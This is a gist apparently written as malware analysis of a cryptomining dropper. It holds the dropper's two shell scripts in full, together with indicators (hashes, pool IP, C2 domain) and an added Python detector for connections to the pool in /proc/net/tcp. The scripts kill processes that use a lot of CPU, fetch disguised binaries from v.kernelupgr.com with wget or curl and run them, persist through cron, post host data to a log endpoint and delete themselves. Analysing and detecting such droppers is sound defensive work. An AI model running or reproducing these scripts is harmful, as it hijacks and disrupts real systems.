@nl5887
Last active March 1, 2019 09:53
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
then
export PATH=`pwd`:$PATH
else
export PATH=/tmp:$PATH
fi
wget -q v.kernelupgr.com/d/vv -O \[bioset\] || curl -s v.kernelupgr.com/d/vv -o \[bioset\]
chmod +x \[bioset\]
(\[bioset\] &)
sleep 2
rm -f \[bioset\]
wget -q v.kernelupgr.com/d/sshd -O sshd || curl -s v.kernelupgr.com/d/sshd -o sshd
chmod +x sshd
(sshd &)
sleep 2
rm -f sshd
wget -t 3 -q v.kernelupgr.com/d/xminstall -O .xminstall || curl -s v.kernelupgr.com/d/xminstall -o .>
(sh .xminstall &)
cd -
rm -f $0

results are posted to: v.kernelupgr.com/log.php

ip address: 5C73CA90 (little-endian hex, the form /proc/net/tcp prints on x86) -> 144.202.115.92

Both vv and sshd are UPX-packed Go binaries.

two cryptominers; m.kernelupgr.com -> 144.202.115.92 is the mining pool

site shows: Mining Proxy Onlin

cryptominer sha256: eb3f65da10056208305836a12652dbcf878521bf1a18cbb997bbe444b3b4ad81

apache sha256: eb3f65da10056208305836a12652dbcf878521bf1a18cbb997bbe444b3b4ad81

vv sha256: 0dda4ed08e936912f0a35ce350d2753154a14556b0ae82b12dd51ccdf2199c92
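The installer below checks for an existing miner connection with `grep 5C73CA90 /proc/net/tcp`, i.e. it matches the pool IP in the little-endian hex form the kernel uses. The following is an added detection example (not part of the gist): it decodes `/proc/net/tcp` rows and reports sockets to the pool address, running against constructed sample lines; `hex_to_ipv4`, `ipv4_to_hex` and `find_connections_to` are names chosen here.

```python
import socket
import struct

# Constructed sample of /proc/net/tcp (not captured from a real host). Row 1 is a
# fake established connection to the mining pool IP noted above; others are benign.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:B1A4 5C73CA90:1F90 01 00000000:00000000 00:00000000 00000000  1000        0 23456 1 0000000000000000 20 4 30 10 -1
   2: 0F02000A:C2B6 08080808:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 34567 1 0000000000000000 20 4 30 10 -1
"""

TCP_STATES = {"01": "ESTABLISHED", "0A": "LISTEN"}  # subset of the kernel's state codes


def hex_to_ipv4(hex_addr: str) -> str:
    """Decode the little-endian hex address /proc/net/tcp prints (5C73CA90 -> 144.202.115.92)."""
    return socket.inet_ntoa(struct.pack("<I", int(hex_addr, 16)))


def ipv4_to_hex(ip: str) -> str:
    """Inverse: dotted quad -> the 8-character token the dropper greps for."""
    return "%08X" % struct.unpack("<I", socket.inet_aton(ip))[0]


def parse_proc_net_tcp(text: str):
    """Return (local_ip, local_port, remote_ip, remote_port, state) for every socket row."""
    rows = []
    for line in text.splitlines()[1:]:  # skip the header line
        fields = line.split()
        if len(fields) < 4:
            continue
        l_hex, l_port = fields[1].split(":")
        r_hex, r_port = fields[2].split(":")
        state = TCP_STATES.get(fields[3], fields[3])
        rows.append((hex_to_ipv4(l_hex), int(l_port, 16), hex_to_ipv4(r_hex), int(r_port, 16), state))
    return rows


def find_connections_to(text: str, ioc_ips):
    """Rows whose remote address is one of the indicator IPs (e.g. the pool 144.202.115.92)."""
    return [row for row in parse_proc_net_tcp(text) if row[2] in set(ioc_ips)]


if __name__ == "__main__":
    # On a live host read open("/proc/net/tcp").read() instead of the sample.
    for row in find_connections_to(SAMPLE_PROC_NET_TCP, {"144.202.115.92"}):
        print("suspect socket: %s:%d -> %s:%d (%s)" % row)
```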

#!/bin/sh
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
wget -q v.kernelupgr.com/d/xminstall -O /tmp/.update || curl -s v.kernelupgr.com/d/xminstall -o /tmp/.update ; sh /tmp/.update
cronpath="/etc/cron.hourly/placekeeper"
cronmd5=`md5sum $cronpath |awk '{print $1}'`
if [ "$cronmd5" != "9776303087238289e7f30393c0c113fe" ]
then
touch $cronpath
if [ $? -eq 0 ]
then
wget -q v.kernelupgr.com/d/xmcron -O $cronpath || curl -s v.kernelupgr.com/d/xmcron -o $cronpath
chmod +x $cronpath
else
(crontab -l |grep -v "kernelupgr"; echo "1 */1 * * * wget -q v.kernelupgr.com/d/xminstall -O /tmp/.update || curl -s v.kernelupgr.com/d/xminstall -o /tmp/.update; sh /tmp/.update") |crontab -
fi
fi
n=`grep 5C73CA90 /proc/net/tcp|wc -l`
if [ $n -ne 0 ]
then
pid=`(command -v netstat >/dev/null && netstat -antp|grep 144.202.115.92|head -n 1 |awk '{print $7}'|awk -F '/' '{print $1}') || (command -v ss > /dev/nll && ss -ntp |grep 144.202.115.92|head -n 1|awk '{print $6}' | awk -F ',' '{print $2}'|tr -cd '[0-9]')`
ps aux|grep -v $pid|awk '$3>40.0{print $2}'|xargs kill -9
rm -f $0
exit
fi
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
then
export PATH=`pwd`:$PATH
else
export PATH=/tmp:$PATH
fi
wget -t 3 -q v.kernelupgr.com/d/xm1.tgz -O apache.tgz || curl -s v.kernelupgr.com/d/xm1.tgz -o apache.tgz
tar xfz apache.tgz
chmod +x apache
apache
if [ $? -ne 0 ]
then
wget -t 3 -q v.kernelupgr.com/d/xm2.tgz -O apache.tgz || curl -s v.kernelupgr.com/d/xm2.tgz -o apache.tgz
tar xfz apache.tgz
chmod +x apache
apache
if [ $? -ne 0 ]
then
uname -a > tmp
apache &>> tmp
wget -t 3 -q --post-data="$(cat tmp)" v.kernelupgr.com/log.php -O /dev/null
rm -f tmp
fi
fi
rm -f apache.tgz apache config.json
cd -
rm -f $0